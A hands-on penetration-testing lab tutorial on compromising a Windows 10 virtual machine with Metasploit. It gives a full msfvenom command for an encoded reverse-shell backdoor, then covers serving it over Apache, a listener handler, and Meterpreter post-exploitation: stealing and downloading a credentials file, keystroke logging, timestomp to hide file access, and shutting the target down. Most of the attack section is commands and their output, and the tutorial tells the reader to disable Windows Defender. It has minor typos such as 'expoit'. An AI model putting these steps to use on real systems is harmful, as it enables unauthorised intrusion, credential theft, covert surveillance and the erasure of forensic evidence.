Network-Servers-Penetration-Guides-and-Tools

Hacking Windows using Metasploit / Meterpreter - Post-Exploitation

Metasploit Framework is a tool for developing and executing exploit code against a remote target machine.

Backdoors

Backdoors are malicious files that contain Trojan or other infectious applications that can either halt the current system of a target machine or even gain partial/complete control over it. Attackers build such backdoors in attempt to gain remote access to victim machines. They send these backdoors through email, file-sharing web applications, shared networks drivers, among others, and entice the users to execute them. Once a user executes such application, and attacker can gain access to his/her affected machine and perform activities such as keylogging, sensitive data extraction, and so on.

Objectives

• Learn to detect Trojan and Backdoor attacks.
• Creating a server and testing the network for attack.
• Attacking a network using a sample backdoor and monitor system activity.

Requisites

• Kali Linux virtual machine
• Windows 10 virtual machine (Target)

---

Before beginning this lab, create a file called passwords.txt on Windows 10 and write down some fake accounts like:

• paypal: bobby123 / qwerty123
• twitter: bobby_123 / password123
• (…)

Save the file on your Desktop or Downloads folder.

Note: Make sure to disable Windows SmartScreen and Windows Defender.

Prepare the Backdoor

1. Create the Backdoor.exe

Switch to the Kali Linux and open the Terminal window.

Type the command to create the payload:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.0.2.42 -f exe > /root/Desktop/Backdoor.exe

Make sure to put your Kali IP on LHOST. If works, you will get this message below:

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes

2. Share the Backdoor.exe

Start the Apache services:
service apache2 start

If you didn’t have apache2 installed, type: apt-get install apache2

Copy the Backdoor.exe to the /www/html/share/ folder which will be visible from the web:
cp /root/Desktop/Backdoor.exe /var/www/html/share/

3. Set up the Handler

Open a new Terminal window and start the Metasploit Framework:
msfconsole

To handle exploits launched outside the framework, select the exploit/multi/handler:
use exploit/multi/handler

Set the reverse TCP payload:
set payload windows/meterpreter/reverse_tcp

To view the payload configurations:
options

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port

Set the LHOST to your Kali IP:
set LHOST 10.0.2.42

The LPORT is correct, as shown above (4444).

To start the handler on the background, type:
expoit -j -z

Download and Execute the Backdoor.exe

Switch to your Windows 10 virtual machine and launch the browser.

Type the URL (based on your Kali IP):
http://10.0.2.42/share/

Then, download the backdoor.exe

Double-click on the application and accept the Warnings.

Now Switch back to the Kali.

If everything works, you will find that have a Meterpreter session open in the Metasploit terminal.

Using Meterpreter

To display the target system information, such as computer name, OS and so on, type:

sysinfo

meterpreter > sysinfo
Computer        : DESKTOP-ICB2IQ4
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

To view IP address, MAC address and so on, type:

ipconfig

meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  3
============
Name         : Intel(R) PRO/1000 MT Desktop Adapter
Hardware MAC : 08:00:27:f8:e8:ec
MTU          : 1500
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::b8c2:616d:b6a1:1f4e
IPv6 Netmask : ffff:ffff:ffff:ffff::

To get the user that the server is running as, type:

getuid

meterpreter > getuid
Server username: DESKTOP-ICB2IQ4\dummy

Go to the folder that contains the passwords.txt that you created before, using cd(change directory), ls(list), pwd(working directory) commands.

meterpreter > cd Desktop 
meterpreter > ls
Listing: C:\Users\dummy\Desktop
===============================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100777/rwxrwxrwx  6646896  fil   2018-12-19 16:48:13 -0500  ProxySwitcher.exe
100777/rwxrwxrwx  73802    fil   2018-12-18 15:45:13 -0500  T3st.exe
100666/rw-rw-rw-  282      fil   2018-12-13 14:38:05 -0500  desktop.ini
100666/rw-rw-rw-  173      fil   2018-12-20 12:28:02 -0500  passwords.txt.txt

After you find the file, use the cat command to read the contents of the text file:

meterpreter > cat passwords.txt.txt 
amex: bobby12 / qwerty123
paypal: bobby_123 / password123
twitter: b0bby1337 / password123
reddit: b0bby1337 / password123
google: bobby_31337@gmail.com / password1337

The MACE Attributes (Modified-Accessed-Created-Entry)

While performing post exploitation activities, a hacker tries to access files to read their contents. Upon doing so, the MACE attributes change immediately, which gives and indication to the file user/owner that someone has read or modified the information.

To leave no hint of these MACE attributes, use the timestomp command to change the attributes as you wish after accessing a file.

TO view the mace attributes of passwords.txt, type:

timestomp passwords.txt -v

This command displays the created time, accessed time, modified time, and entry modified time, as shown below:

meterpreter > timestomp passwords.txt.txt -v
[*] Showing MACE attributes for passwords.txt.txt
Modified      : 2018-12-20 12:29:25 -0500
Accessed      : 2018-12-20 12:28:02 -0500
Created       : 2018-12-20 12:28:02 -0500
Entry Modified: 2018-12-20 12:29:25 -0500

Download a File

download <filename>

meterpreter > download passwords.txt.txt
[*] Downloading: passwords.txt.txt -> passwords.txt.txt
[*] Downloaded 173.00 B of 173.00 B (100.0%): passwords.txt.txt -> passwords.txt.txt
[*] download   : passwords.txt.txt -> passwords.txt.txt

The downloaded file is stored in the Home folder by default.

Locating files with Search

The search command helps you locate files on the target machine. The command is capable of search through the whole system or specific folder.

search -f pagefile.sys

meterpreter > search -f pagefile.sys
Found 1 result...
    c:\pagefile.sys (1476395008 bytes)

Log all the Key strokes

To start capturing all keyboard input from the target system, type:

keyscan_start

meterpreter > keyscan_start
Starting the keystroke sniffer ...

Switch to the Windows 10, create a text file and type something:

Switch back to the Kali Linux and dump the captured Keystrokes, by typing:

keyscan_dump

meterpreter > keyscan_dump 
Dumping captured keystrokes...
<Shift><Shift><Shift><Shift>Fox.txt<CR>
<Shift>The quick brown fox jumps over the lazy hacker.<^S>

View the idle time

You can see the number of seconds for which the user has been idle on the remote system, by typing:

idletime

meterpreter > idletime 
User has been idle for: 4 mins 31 secs

You may shut down the target machine after performing post exploitation, by typing:

shutdown

meterpreter > shutdown
Shutting down...
meterpreter > 
[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: Died

Useful links:

• Metasploit Cheat Sheet - SANS
• Meterpreter Cheat Sheet
• Meterpreter Cheat Sheet 2
• Meterpreter Big Tutorial
• Msfvenom Cheat Sheet